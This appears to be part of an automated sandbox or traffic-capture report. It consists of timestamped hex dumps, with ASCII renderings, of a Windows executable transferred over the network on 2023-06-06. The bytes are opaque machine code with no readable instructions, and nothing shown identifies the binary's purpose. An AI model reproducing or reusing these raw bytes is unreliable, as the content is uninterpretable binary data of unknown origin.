                                                                                                  Data Ascii: wt SNts(*S$YYu[7Y_^HGxQVuN(ENEseNvY^MdHG*QVW}wetSNtSYu[7Y_M^dVWwtSNtSPYu[7
                                                                                                  2023-06-06 15:28:28 UTC144INData Raw: 83 fe 01 00 00 8d 8d 74 ff ff ff 89 9d 68 ff ff ff 89 9d 6c ff ff ff 88 9d 72 ff ff ff e8 2b e2 fd ff 8b 45 14 c6 45 fc 02 3b c3 75 21 ff b5 74 ff ff ff e8 0e d3 fd ff 59 88 5d fc 8d 4d cc e8 5c 15 00 00 b8 05 40 00 80 e9 06 08 00 00 8d 55 c4 8b 08 52 8d 55 c8 52 8d 55 b8 52 56 50 ff 51 14 8b f8 3b fb 0f 85 e0 00 00 00 39 5d c8 89 b5 64 ff ff ff 0f 95 c0 39 5d b8 88 85 71 ff ff ff 0f 95 c0 39 5d c8 88 85 70 ff ff ff 8b 45 c4 89 85 60 ff ff ff 74 7e 66 89 5d 9c 66 89 5d 9e 89 5d a4 8b 45 14 8d 55 9c 52 6a 06 8b 08 56 50 c6 45 fc 03 ff 51 18 8b f8 3b fb 74 08 8d 4d 9c e9 82 00 00 00 66 39 5d 9c 75 08 88 9d 72 ff ff ff eb 1c 66 83 7d 9c 0b 74 08 8d 4d 9c e9 fc 00 00 00 66 39 5d a4 0f 95 c0 88 85 72 ff ff ff 8d 4d 9c c6 45 fc 02 e8 d5 46 fe ff 8b 4d 14 8d 85
                                                                                                  Data Ascii: thlr+EE;u!tY]M\@URURURVPQ;9]d9]q9]pE`t~f]f]]EURjVPEQ;tMf9]urf}tMf9]rMEFM
                                                                                                  2023-06-06 15:28:28 UTC160INData Raw: b7 fd ff 8b 55 bc 8d 45 e0 89 75 e0 8b 4f 30 50 e8 62 72 fe ff 3b c3 74 07 8b f0 e9 df 00 00 00 39 5d e0 75 08 6a 01 5e e9 d2 00 00 00 83 7d e4 00 76 42 8b 85 7c ff ff ff 8b 34 98 85 f6 7c 2f 8b 07 8b 40 08 8b 04 b0 8b 00 c1 e8 08 a8 01 74 1e 8d 4d c4 e8 ec 66 01 00 8b 45 c8 8b 4d c4 ff 45 c8 89 34 81 8b 85 7c ff ff ff 83 0c 98 ff 43 3b 5d e4 72 be 8b 0f 6a 00 8d 45 c4 6a 00 50 8d 95 7c ff ff ff ff 75 e4 e8 e9 28 00 00 ff 75 e0 8b 0f 8d 45 c4 8d 95 7c ff ff ff ff 75 bc 50 ff 75 e4 e8 cf 28 00 00 e9 2e 01 00 00 83 ec 0c 8d 85 7c ff ff ff 8b cc 89 a5 60 ff ff ff 50 e8 74 42 00 00 8b 0f ba c0 b1 47 00 e8 ed 2e 00 00 8b d8 85 db 0f 8c 01 01 00 00 be 00 04 00 00 8d 4d bc 56 e8 3e b6 fd ff 8b 55 bc 8d 45 88 89 75 88 8b 4f 30 50 e8 7e 71 fe ff 8b f0 85 f6 74 41
                                                                                                  Data Ascii: UEuO0Pbr;t9]uj^}vB|4|/@tMfEME4|C;]rjEjP|u(uE|uPu(.|`PtBG.MV>UEuO0P~qtA
                                                                                                  2023-06-06 15:28:28 UTC176INData Raw: 8b 08 66 85 c9 74 6e 66 83 78 02 00 75 54 66 83 f9 41 72 09 66 83 f9 5a 77 03 83 c1 20 0f b7 c1 83 e8 62 74 50 83 e8 05 74 1a 83 e8 04 74 11 48 48 74 09 83 e8 07 75 2a 6a 28 eb 0a 6a 14 eb 06 6a 0a eb 02 6a 1e 5f 33 d2 6a 40 59 6a 01 2b cf 58 e8 a0 29 04 00 39 55 f8 72 0b 77 05 39 45 f4 72 04 32 c0 eb 19 8b 45 f4 8b 55 f8 8b cf e8 83 29 04 00 eb 03 8b 45 f4 89 06 89 56 04 b0 01 5f 5e c9 c3 b8 4c 56 47 00 e8 29 26 04 00 83 ec 34 53 56 89 4d ec 57 8b 4d 08 8b fa e8 62 04 00 00 8b 47 04 80 65 f3 00 33 f6 85 c0 0f 86 8f 00 00 00 8b 07 66 ba 2e 00 8d 0c 70 e8 94 56 fd ff 85 c0 7c 07 8d 1c 30 85 db 7d 03 8b 5f 04 8b c3 8b cf 2b c6 50 8d 45 e0 56 50 e8 32 c0 fd ff 83 65 fc 00 83 7d e4 00 74 6b 8d 4d c0 e8 35 4b ff ff 8b 4d ec 8d 45 c0 50 8d 55 e0 e8 61 00 00 00
                                                                                                  Data Ascii: ftnfxuTfArfZw btPttHHtu*j(jjj_3j@Yj+X)9Urw9Er2EU)EV_^LVG)&4SVMWMbGe3f.pV|0}_+PEVP2e}tkM5KMEPUa
                                                                                                  2023-06-06 15:28:28 UTC192INData Raw: ff 59 e9 8d 02 00 00 8b 4d 28 e8 36 e7 00 00 8b 4d 28 8d 45 dc 50 e8 0f 0a fd ff c6 45 fc 0c ff 75 dc e8 1f 13 fd ff 59 e9 29 01 00 00 38 5e 06 0f 85 24 08 00 00 8b 45 10 3b c3 74 7d 8b 88 d8 00 00 00 8b 90 dc 00 00 00 03 48 50 13 50 54 89 55 e4 78 66 7f 04 3b cb 76 60 8b 45 ec c6 45 fc 0b 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e8 c6 45 fc 08 3b c3 74 06 8b 08 50 ff 51 08 3b fb c6 45 fc 03 74 06 8b 07 57 ff 50 08 8d 4d a4 c6 45 fc 02 e8 e2 fe fe ff ff 75 d0 e8 a8 12 fd ff 59 8b 45 f0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 b8 01 40 00 80 e9 1a 0a 00 00 68 88 00 00 00 e8 4e 12 fd ff 59 89 45 08 3b c3 c6 45 fc 13 74 0c 8b c8 e8 dc 0a 00 00 89 45 08 eb 03 89 5d 08 8b 45 08 8d 4d e8 50 c6 45 fc 0c 89 45 24 e8 01 31 02 00 8d 4d ec ff 75 e8 e8 f6 30 02 00 8b 4d
                                                                                                  Data Ascii: YM(6M(EPEuY)8^$E;t}HPPTUxf;v`EE;tPQEE;tPQ;EtWPMEuYEM;tPQ@hNYE;EtE]EMPEE$1Mu0M
                                                                                                  2023-06-06 15:28:28 UTC208INData Raw: 81 bc 00 00 00 85 c0 74 12 39 81 c8 00 00 00 75 0a 6a 00 83 c1 18 e8 e5 6a 00 00 c3 53 bb 78 a8 48 00 56 53 ff 15 78 90 47 00 e8 f6 0b 00 00 85 c0 74 04 8b f0 eb 6d 8b 74 24 0c 57 8b ce 83 86 58 01 00 00 01 8d 86 58 01 00 00 83 50 04 00 83 86 50 01 00 00 01 8d 86 50 01 00 00 83 50 04 00 e8 ab fc ff ff 8b be cc 00 00 00 85 ff 74 2d ff 37 ff 35 e0 c1 47 00 ff 15 d4 91 47 00 59 59 ff 74 24 14 8b cf e8 2f d4 fc ff 8b c8 e8 15 d4 fc ff 8b 8e cc 00 00 00 e8 fb d3 fc ff e8 84 0b 00 00 8b f0 5f 53 ff 15 7c 90 47 00 8b c6 5e 5b c2 08 00 53 56 57 8b 7c 24 10 8b d9 33 f6 8b 07 83 67 04 00 80 20 00 8d 43 ff 83 f8 08 77 65 ff 24 85 62 4c 43 00 8b 35 08 c2 47 00 eb 56 85 d2 74 08 8b 35 10 c2 47 00 eb 4a 8b 35 0c c2 47 00 eb 42 85 d2 74 08 8b 35 18 c2 47 00 eb 36 8b 35
                                                                                                  Data Ascii: t9ujjSxHVSxGtmt$WXXPPPPt-75GGYYt$/_S|G^[SVW|$3g Cwe$bLC5GVt5GJ5GBt5G65
                                                                                                  2023-06-06 15:28:28 UTC224INData Raw: 00 8d 4d c8 e8 61 a6 fc ff 8b 45 ec 8d 4d c8 83 c0 0c 50 e8 16 a6 fc ff 8d 4d c8 6a 29 e8 6d 85 fc ff ff 45 e4 8b 45 e4 3b 43 20 72 a3 6a 0d 8d 55 c8 8b ce e8 66 19 00 00 ff 36 6a 20 ff d7 83 7b 30 00 59 59 74 21 ff 36 68 9c e0 47 00 ff 15 d4 91 47 00 59 59 ff 73 30 8b ce e8 7e 96 fc ff ff 30 6a 20 ff d7 59 59 83 65 ec 00 83 7b 38 00 0f 86 a6 00 00 00 83 7d ec 00 74 0f ff 36 68 94 e0 47 00 ff 15 d4 91 47 00 59 59 8b 43 34 8b 4d ec 83 65 e4 00 8b 04 88 89 45 dc 83 78 04 00 76 6c 83 7d e4 00 74 0b ff 36 6a 20 ff d7 8b 45 dc 59 59 8b 00 8b 4d e4 8a 04 08 3c 20 76 04 3c 80 72 33 0f b6 c0 89 45 a8 c1 e8 04 83 f8 0a 73 05 83 c0 30 eb 03 83 c0 37 ff 36 0f b6 c0 50 ff d7 8b 45 a8 59 83 e0 0f 59 83 f8 0a 73 05 83 c0 30 eb 03 83 c0 37 ff 36 0f b6 c0 50 ff d7 ff 45
                                                                                                  Data Ascii: MaEMPMj)mEE;C rjUf6j {0YYt!6hGGYYs0~0j YYe{8}t6hGGYYC4MeExvl}t6j EYYM< v<r3Es076PEYYs076PE
                                                                                                  2023-06-06 15:28:28 UTC240INData Raw: 00 00 00 5b c9 c2 04 00 b8 08 cb 43 00 c3 b8 0e 00 07 80 eb e2 80 b9 c0 00 00 00 00 75 32 83 b9 c8 00 00 00 07 76 29 8b 44 24 04 85 c0 74 06 66 83 38 00 75 05 a1 54 e4 47 00 6a 01 68 fc e5 47 00 ff 74 24 10 83 c1 08 50 e8 ff fa ff ff eb 02 33 c0 c2 08 00 b8 24 6a 47 00 e8 57 26 03 00 83 ec 0c 56 8b f1 57 8b 3d d4 91 47 00 85 f6 74 0c ff 36 ff 35 04 e6 47 00 ff d7 59 59 85 f6 74 13 ff 36 ff 35 08 e6 47 00 ff d7 59 59 8b ce e8 04 54 fc ff 8d 4d e8 e8 fb 5a fc ff 83 65 fc 00 8d 45 e8 50 b9 98 a5 48 00 e8 bc 52 fc ff 84 c0 74 77 a1 98 a5 48 00 8b 40 0c c1 e8 05 a8 01 75 68 8d 4d e8 e8 01 5e fc ff 8d 4d e8 e8 bc 5d fc ff 83 7d ec 00 75 0f a1 98 a5 48 00 8b 40 0c c1 e8 04 a8 01 75 47 83 7d ec 01 8b 4d e8 75 2b 8a 01 3c 41 7c 06 3c 5a 7f 02 04 20 0f be c0 83 e8
                                                                                                  Data Ascii: [Cu2v)D$tf8uTGjhGt$P3$jGW&VW=Gt65GYYt65GYYTMZeEPHRtwH@uhM^M]}uH@uG}Mu+<A|<Z
                                                                                                  2023-06-06 15:28:28 UTC256INData Raw: 83 e8 05 74 18 83 e8 23 75 36 8b 45 08 ff 70 34 ff 70 30 8d 4d f0 e8 5b 87 fc ff eb 23 8b 45 08 39 48 1c 74 1b 8b 40 18 ff 70 04 ff 30 eb e4 8b 45 08 ff 70 10 eb 01 51 8d 4d f0 e8 11 87 fc ff ff 75 10 8d 4d f0 e8 5d 88 fc ff 8d 4d f0 e8 7c 87 fc ff 33 c0 c9 c2 0c 00 b8 4e 6e 47 00 e8 53 e6 02 00 81 ec 8c 00 00 00 53 56 8b f1 57 56 8b 06 ff 50 10 8b 45 0c 33 ff 3b c7 0f 84 96 05 00 00 89 7d ec 8b 08 8d 55 ec 52 68 b0 d0 47 00 50 89 7d fc ff 11 39 7d ec 0f 84 79 05 00 00 8d 4d cc e8 a7 21 fc ff 66 89 bd 74 ff ff ff 66 89 bd 76 ff ff ff 89 bd 7c ff ff ff 8b 45 ec 6a 02 5b 8d 95 74 ff ff ff 8b 08 52 6a 04 50 88 5d fc ff 51 0c 3b c7 89 45 dc 74 2d 8d 8d 74 ff ff ff e8 eb 86 fc ff ff 75 cc e8 5a 12 fc ff 8b 45 ec 83 4d fc ff 3b c7 59 74 06 8b 08 50 ff 51 08 8b
                                                                                                  Data Ascii: t#u6Ep4p0M[#E9Ht@p0EpQMuM]M|3NnGSSVWVPE3;}URhGP}9}yM!ftfv|Ej[tRjP]Q;Et-tuZEM;YtPQ
                                                                                                  2023-06-06 15:28:28 UTC272INData Raw: 0c ff 36 ff 15 1c 92 47 00 83 26 00 5e c3 56 8b f1 e8 cc ff ff ff ff 36 ff 15 1c 92 47 00 5e c3 56 8b f1 8b 06 85 c0 74 17 8b 4e 08 8d 4c 09 02 51 6a 00 50 e8 e3 a9 02 00 83 c4 0c 83 66 04 00 5e c3 56 8b f1 57 ff 74 24 0c 8d 7e 04 8b cf e8 58 88 ff ff 33 c9 8d 46 78 89 4e 68 89 4e 6c 89 4e 70 89 4e 74 89 08 89 48 04 89 48 08 c7 07 94 ea 47 00 c7 06 88 ea 47 00 8b c6 5f 5e c2 04 00 8b 44 24 04 ff 40 68 8b 40 68 c2 04 00 8b 4c 24 04 ff 49 68 8b 41 68 75 10 85 c9 74 0a 8b 41 04 83 c1 04 6a 01 ff 10 33 c0 c2 04 00 ff 74 24 10 8b 41 74 8b 4c 24 08 ff 74 24 10 8b 0c 88 ff 74 24 10 83 c1 18 e8 98 85 ff ff c2 10 00 56 8b f1 e8 18 00 00 00 f6 44 24 08 01 74 0a 8d 46 fc 50 e8 61 d2 fb ff 59 8d 46 fc 5e c2 04 00 b8 b7 72 47 00 e8 bf a5 02 00 51 56 8b f1 89 75 f0 8d
                                                                                                  Data Ascii: 6G&^V6G^VtNLQjPf^VWt$~X3FxNhNlNpNtHHGG_^D$@h@hL$IhAhutAj3t$AtL$t$t$VD$tFPaYF^rGQVu
                                                                                                  2023-06-06 15:28:28 UTC288INData Raw: ff ff 75 e0 e8 6a f7 ff ff 2b d8 89 5d ec eb 27 8d 46 05 3b c3 77 32 2b de 33 c0 85 f6 89 5d ec 76 15 8d 8c 1d a0 fe ff ff 8b 55 c0 8a 14 10 88 14 01 40 3b c6 72 f2 ff 75 c0 83 4d fc ff e8 03 93 fb ff 59 e9 6c ff ff ff ff 75 c0 e8 f5 92 fb ff 59 eb 03 8b 5d ec 83 7d d0 00 74 29 83 fb 04 72 24 4b c6 84 1d a0 fe ff ff 20 4b c6 84 1d a0 fe ff ff 2e 4b c6 84 1d a0 fe ff ff 2e 4b c6 84 1d a0 fe ff ff 2e 8b 4d 0c 8d 94 1d a0 fe ff ff e8 bc 05 fc ff 5f 5b 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c2 08 00 c6 01 3a 8d 41 01 8a 0a 84 c9 88 08 74 0d 2b d0 8a 4c 02 01 40 84 c9 88 08 75 f5 8b 4c 24 04 8b d0 e8 e7 8c fb ff c2 04 00 53 56 8b 74 24 18 57 8b ce e8 1b 07 fc ff 33 db 3b c3 0f 85 e9 01 00 00 8b 44 24 14 8b 4c 24 10 8b f8 8b 91 08 01 00 00 c1 e7 04 03 d7 8b 7c 24
                                                                                                  Data Ascii: uj+]'F;w2+3]vU@;ruMYluY]}t)r$K K.K.K.M_[M^d:At+L@uL$SVt$W3;D$L$|$
                                                                                                  2023-06-06 15:28:28 UTC304INData Raw: d1 ea 89 14 88 8b 45 18 8b 55 14 41 3b 4d 08 89 4d 0c 8d 44 50 02 89 45 18 72 a3 8b 4d 18 8b 87 f0 00 00 00 8b 55 0c d1 e9 89 0c 90 8b 45 e8 39 45 18 74 04 c6 46 3c 01 c6 45 fc 07 8d 4d 84 eb 3f 8d 87 c4 00 00 00 8b ce 50 ff 75 08 e8 fb f8 ff ff 80 65 90 00 80 65 91 00 8d 45 dc 8d 4d 8c 50 56 c6 45 fc 09 e8 2b e2 ff ff 8d 87 c4 00 00 00 8b ce 50 e8 e1 eb ff ff c6 45 fc 07 8d 4d 8c e8 81 e1 ff ff 8b cb e8 e7 73 00 00 8b 43 04 8b 55 c4 8d 48 01 89 4b 04 8b 0b 89 14 c1 8b 55 c8 89 54 c1 04 e9 bd 00 00 00 8d 45 a0 8b ce 50 ff 75 08 e8 48 f8 ff ff 8d 4d a0 e8 2b e1 ff ff 83 65 b0 00 83 65 bc 00 89 45 10 eb b9 8d 45 ac eb 03 8d 45 b8 50 8b ce ff 75 10 e8 20 f8 ff ff eb a4 ff 75 08 8d 87 ac 00 00 00 eb 19 ff 75 08 8d 47 64 eb 11 ff 75 08 8d 47 7c eb 09 ff 75 08
                                                                                                  Data Ascii: EUA;MMDPErMUE9EtF<EM?PueeEMPVE+PEMsCUHKUTEPuHM+eeEEEPu uuGduG|u
                                                                                                  2023-06-06 15:28:28 UTC320INData Raw: c3 8d 8d 74 ff ff ff e8 4b 6a fc ff 8b 85 78 ff ff ff 8b 8d 74 ff ff ff ff 85 78 ff ff ff 84 db 88 1c 08 74 11 8b 06 8b 4e 04 01 85 6c ff ff ff 11 8d 70 ff ff ff 8b 45 e8 83 45 f0 10 83 c7 04 3b 45 a0 72 90 8b 85 38 fc ff ff 33 db 89 45 b4 89 5d e8 6a 28 c6 45 fc 18 89 9d 48 ff ff ff e8 ae 12 fb ff 3b c3 59 74 1e c7 40 04 48 f1 47 00 89 58 08 89 58 0c c7 00 38 f1 47 00 c7 40 04 28 f1 47 00 8b f8 eb 02 33 ff 3b fb 89 7d f0 89 7d d0 74 06 8b 07 57 ff 50 04 8b 45 14 c6 45 fc 19 80 78 2b 00 0f 84 b1 00 00 00 8b b5 80 fd ff ff 89 9d 58 ff ff ff 8d 46 08 f7 de 1b f6 23 f0 8d 85 58 ff ff ff 8d 8d 1c ff ff ff 50 8d 45 e8 50 c6 45 fc 1a e8 7c ec fb ff 8d 8d 1c ff ff ff e8 1b ec fb ff 3b c3 89 45 f0 0f 85 fd 0f 00 00 8b 85 80 fd ff ff ff b5 58 ff ff ff 8d 48 34 e8
                                                                                                  Data Ascii: tKjxtxtNlpEE;Er83E]j(EH;Yt@HGXX8G@(G3;}}tWPEEx+XF#XPEPE|;EXH4
                                                                                                  2023-06-06 15:28:28 UTC336INData Raw: ff ff 85 c0 74 06 8b 10 50 ff 52 08 33 c0 e9 fa 00 00 00 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 08 50 ff 51 08 8b c5 e9 da 00 00 00 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 10 50 ff 52 08 8b c7 e9 ba 00 00 00 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 10 50 ff 52 08 b8 05 40 00 80 e9 97 00 00 00 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 08 50 ff 51 08 8b c6 eb 7a 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 08 50 ff 51 08 b8 05 40 00 80 eb 5a 85 d2 c7 84 24 04 03 00 00 ff ff ff ff 74 06 8b 02 52 ff 50 08 b8 05 40 00 80 eb 3e 85 d2 c7 84 24 04 03 00 00 ff ff ff ff 74 06 8b 0a 52 ff 51 08 b8 05 40 00 80 eb 22 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b
                                                                                                  Data Ascii: tPR3D$$tPQD$$tPRD$$tPR@D$$tPQzD$$tPQ@Z$tRP@>$tRQ@"D$$t
                                                                                                  2023-06-06 15:28:28 UTC352INData Raw: 04 64 89 0d 00 00 00 00 83 c4 10 c3 8b 4c 24 04 33 c0 64 89 0d 00 00 00 00 83 c4 10 c3 90 90 90 90 90 90 90 90 90 e9 0b 00 00 00 90 90 90 90 90 90 90 90 90 90 90 b9 f8 f6 47 00 e9 9e 19 fb ff 90 90 90 90 90 90 83 ec 58 53 56 57 8b f9 8d 5f 20 c7 47 18 00 00 00 00 8b cb c6 47 1c 00 e8 03 1d 01 00 83 3f 00 75 23 ba 84 f9 47 00 b9 7c f9 47 00 e8 9f 0f 01 00 85 c0 89 07 75 0e 5f 5e b8 0e 00 07 80 5b 83 c4 58 c2 14 00 8d 4c 24 34 e8 52 0f 01 00 8b 4f 04 8b 47 08 85 c9 c7 44 24 0c 00 00 00 00 74 24 83 f8 01 76 1f 8b 4f 10 33 d2 8b f1 3b ce 75 05 3b 57 14 74 03 83 c9 ff 89 4c 24 48 c7 44 24 0c 01 00 00 00 89 44 24 40 8b 44 24 68 50 8d 4c 24 50 e8 34 1e fb ff 8b 4c 24 6c 51 8d 4c 24 20 e8 97 1e fb ff 8b 74 24 78 8d 4c 24 10 56 e8 bb 1d fb ff f7 de 1b f6 8d 54 24
                                                                                                  Data Ascii: dL$3dGXSVW_ GG?u#G|Gu_^[XL$4ROGD$t$vO3;u;WtL$HD$D$@D$hPL$P4L$lQL$ t$xL$VT$
                                                                                                  2023-06-06 15:28:28 UTC368INData Raw: 56 8b 74 24 18 57 8b 7c 24 14 2b ca eb 08 8d a4 24 00 00 00 00 90 0f b6 44 11 02 0f b7 2c 11 c1 e0 10 33 c5 8b ea 2b 2c 87 83 c6 04 89 6e fc 89 14 87 42 4b 75 e0 5f 5e 5d 5b c2 14 00 cc cc cc cc cc cc cc cc cc 81 ec 10 08 00 00 53 55 89 4c 24 08 56 8b b4 24 30 08 00 00 8d 4c 24 1c 2b ce 89 54 24 10 89 4c 24 18 8d 54 24 20 2b d6 8d ac 24 1c 04 00 00 8d 8c 24 20 04 00 00 2b ee 2b ce 57 8d 46 08 8b b4 24 28 08 00 00 89 54 24 18 33 ff eb 03 8d 49 00 8b 58 f8 8b d3 c1 e3 05 23 de 23 d6 89 5c 3c 20 8b 58 fc 89 94 3c 20 04 00 00 8b d3 c1 e3 05 23 de 23 d6 89 5c 3c 24 8b 18 89 94 3c 24 04 00 00 8b d3 23 d6 c1 e3 05 89 14 28 8b 54 24 1c 23 de 89 1c 02 8b 58 04 8b d3 23 d6 c1 e3 05 89 14 01 8b 54 24 18 23 de 89 1c 02 83 c7 10 83 c0 10 81 ff 00 04 00 00 72 99 8b 9c
                                                                                                  Data Ascii: Vt$W|$+$D,3+,nBKu_^][SUL$V$0L$+T$L$T$ +$$ ++WF$(T$3IX##\< X< ##\<$<$#(T$#X#T$#r
                                                                                                  2023-06-06 15:28:28 UTC384INData Raw: 2b ce 8b 74 24 44 66 89 4c 7d 68 8b 4c 24 48 89 74 24 48 8b 74 24 40 89 74 24 44 8b 74 24 34 89 74 24 40 89 4c 24 34 83 ff 07 1b c9 83 e1 fd 83 c1 0b 8d b5 00 f6 ff ff 0f b7 3e 89 4c 24 18 3d 00 00 00 01 73 14 8b 4c 24 10 0f b6 19 c1 e2 08 c1 e0 08 0b d3 41 89 4c 24 10 8b c8 c1 e9 0b 0f af cf 3b d1 0f 83 23 01 00 00 bb 00 08 00 00 2b df c1 eb 05 03 df 8b 7c 24 24 66 89 1e 8d 34 7e 0f b7 7e 02 8b c1 81 f9 00 00 00 01 73 16 c1 e1 08 8b c1 8b 4c 24 10 0f b6 19 c1 e2 08 0b d3 41 89 4c 24 10 8b c8 c1 e9 0b 0f af cf 3b d1 73 19 8b c1 b9 00 08 00 00 2b cf c1 e9 05 03 cf 66 89 4e 02 b9 02 00 00 00 eb 14 2b c1 2b d1 8b cf c1 e9 05 2b f9 66 89 7e 02 b9 03 00 00 00 8d 1c 09 0f b7 0c 33 3d 00 00 00 01 73 13 8b 7c 24 10 0f b6 3f c1 e2 08 c1 e0 08 0b d7 ff 44 24 10 8b
                                                                                                  Data Ascii: +t$DfL}hL$Ht$Ht$@t$Dt$4t$@L$4>L$=sL$AL$;#+|$$f4~~sL$AL$;s+fN+++f~3=s|$?D$
                                                                                                  2023-06-06 15:28:28 UTC400INData Raw: cc 02 00 00 00 74 0a c7 81 d0 00 00 00 08 00 00 00 8b 81 d0 00 00 00 85 c0 74 0a c7 81 ac 00 00 00 01 00 00 00 c3 83 bf a8 00 00 00 00 53 56 c7 87 ac 00 00 00 01 00 00 00 74 0e 8b 47 4c 23 44 24 0c 8b f7 e8 fd fd ff ff 8d 77 58 bb 05 00 00 00 eb 03 8d 49 00 8b c6 e8 19 e0 ff ff 4b 75 f6 e8 d1 df ff ff 8b cf e8 5a ff ff ff 5e 5b c2 04 00 cc cc cc cc cc 83 ec 08 53 55 56 57 bf 02 00 00 00 8d 88 10 12 00 00 0f b7 a8 32 1e 00 00 8d 77 fe 8b de 83 e3 01 8b d3 83 c3 02 03 db 89 5c 24 10 0f b7 9c 03 30 1e 00 00 f7 da 81 e2 f0 07 00 00 33 d5 d1 ee c1 eb 04 8b ee 83 e5 01 89 6c 24 14 f7 dd c1 ed 04 83 e5 7f 33 dd c1 ea 04 8b 94 90 60 07 00 00 03 94 98 60 07 00 00 8b 5c 24 10 03 5c 24 14 d1 ee 03 db 89 5c 24 10 0f b7 9c 03 30 1e 00 00 83 e6 01 c1 eb 04 8b ee f7 dd
                                                                                                  Data Ascii: ttSVtGL#D$wXIKuZ^[SUVW2w\$03l$3``\$\$\$0
                                                                                                  2023-06-06 15:28:28 UTC416INData Raw: 00 00 00 66 89 07 e8 ab 56 00 00 3b 46 08 74 08 5f b8 11 00 00 00 5e c3 b8 0f 00 00 00 66 3b 07 5f 1b c0 83 e0 04 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 46 04 8d 4e 04 33 d2 83 c0 01 13 d2 0f a4 c2 02 03 c0 03 c0 57 5f 39 44 24 08 75 3e 39 54 24 0c 75 38 ba 06 00 00 00 e8 53 56 00 00 39 06 75 2a 0f b6 4e 08 0f b6 56 09 66 c1 e1 08 66 0b ca 66 39 4c 24 04 75 14 80 7e 0a 59 75 0e 80 7e 0b 5a 75 08 b8 01 00 00 00 c2 0c 00 33 c0 c2 0c 00 57 0f b6 7a 10 83 e7 03 8b c7 c1 e0 05 83 7c 10 18 21 8d 4c 10 18 75 6e 83 79 04 00 75 68 b8 01 00 00 00 39 41 08 75 5e 80 79 0c 28 77 58 53 33 db 56 85 ff 74 46 8d 4a 18 8d a4 24 00 00 00 00 8b 11 8b 71 04 83 fa 03 75 09 85 f6 75 10 39 41 08 eb 1e 85 f6 75 07 83 fa 03 72 24 85 f6 77 20 72 05 83 fa 0a 77 19 8b 51
                                                                                                  Data Ascii: fV;Ft_^f;_^FN3W_9D$u>9T$u8SV9u*NVfff9L$u~Yu~Zu3Wz|!Lunyuh9Au^y(wXS3VtFJ$quu9Aur$w rwQ
                                                                                                  2023-06-06 15:28:28 UTC432INData Raw: 0f 87 e5 00 00 00 8b 54 24 24 57 8b 7c 24 1c 8b cf e8 70 b6 ff ff 85 f6 0f 84 8e 00 00 00 8b 4c 24 28 89 77 04 8b 01 8b d6 c1 e2 04 ff d0 33 c9 89 47 08 3b c1 75 0d 5f 5b 5e 8d 41 02 5d 83 c4 08 c2 10 00 89 4c 24 24 3b f1 76 60 89 4c 24 28 eb 08 8d 64 24 00 8b 7c 24 1c 8b 77 08 03 74 24 28 8b 4c 24 20 8d 7e 08 8b d5 57 2b d3 03 cb e8 72 b7 ff ff 85 c0 74 64 03 d8 8b 44 24 20 8b d5 56 2b d3 8d 0c 03 e8 5b b7 ff ff 85 c0 74 4d 8b 0f 03 d8 0b 4f 04 74 44 8b 44 24 24 83 44 24 28 10 40 89 44 24 24 3b 44 24 10 72 aa f6 c3 03 74 16 eb 03 8d 49 00 8b 54 24 20 8a 04 13 43 84 c0 75 1a f6 c3 03 75 ef 8b c3 2b c5 5f f7 d8 5b 1b c0 5e 83 e0 10 5d 83 c4 08 c2 10 00 5f 5b 5e b8 10 00 00 00 5d 83 c4 08 c2 10 00 5b 5e b8 10 00 00 00 5d 83 c4 08 c2 10 00 cc cc cc cc cc cc
                                                                                                  Data Ascii: T$$W|$pL$(w3G;u_[^A]L$$;v`L$(d$|$wt$(L$ ~W+rtdD$ V+[tMOtDD$$D$(@D$$;D$rtIT$ Cuu+_[^]_[^][^]
                                                                                                  2023-06-06 15:28:28 UTC448INData Raw: bc b0 00 10 04 00 8b 45 18 89 44 24 18 3b f8 73 06 8b c7 89 7c 24 18 8b 7c 24 2c ba 03 00 00 00 8b 74 24 20 3b f8 73 33 8b c6 2b c7 89 44 24 2c 8a 00 3a 06 75 21 8d 47 ff c7 03 02 00 00 00 89 43 04 83 c3 08 8b 44 24 2c 8a 40 02 3a 46 02 74 23 3b 4c 24 18 eb 06 8b 44 24 18 3b c8 73 65 8b c6 2b c1 8a 00 3a 06 75 5b 8d 41 ff 8b f9 89 43 04 83 c3 08 8b 44 24 14 8d 56 03 03 c6 89 44 24 2c 3b d0 74 12 8b ca 2b cf 8b f8 8a 01 3a 02 75 06 42 41 3b d7 75 f4 2b d6 89 53 f8 3b 54 24 14 75 22 8b 4d 14 8b 45 28 8b 54 24 10 89 14 88 8b 45 04 ff 45 14 40 ff 45 00 3b 45 08 89 45 04 e9 fa 00 00 00 8b 45 30 8b 4d 00 8b 7d 18 8b 75 14 89 44 24 2c 8b 45 28 89 44 24 18 8b 45 04 8b 6c 24 18 89 44 24 30 8b 44 24 14 03 c1 89 7c 24 38 89 44 24 34 8b 44 24 10 89 44 b5 00 8b 6c 24
                                                                                                  Data Ascii: ED$;s|$|$,t$ ;s3+D$,:u!GCD$,@:Ft#;L$D$;se+:u[ACD$VD$,;t+:uBA;u+S;T$u"ME(T$EE@E;EEE0M}uD$,E(D$El$D$0D$|$8D$4D$Dl$
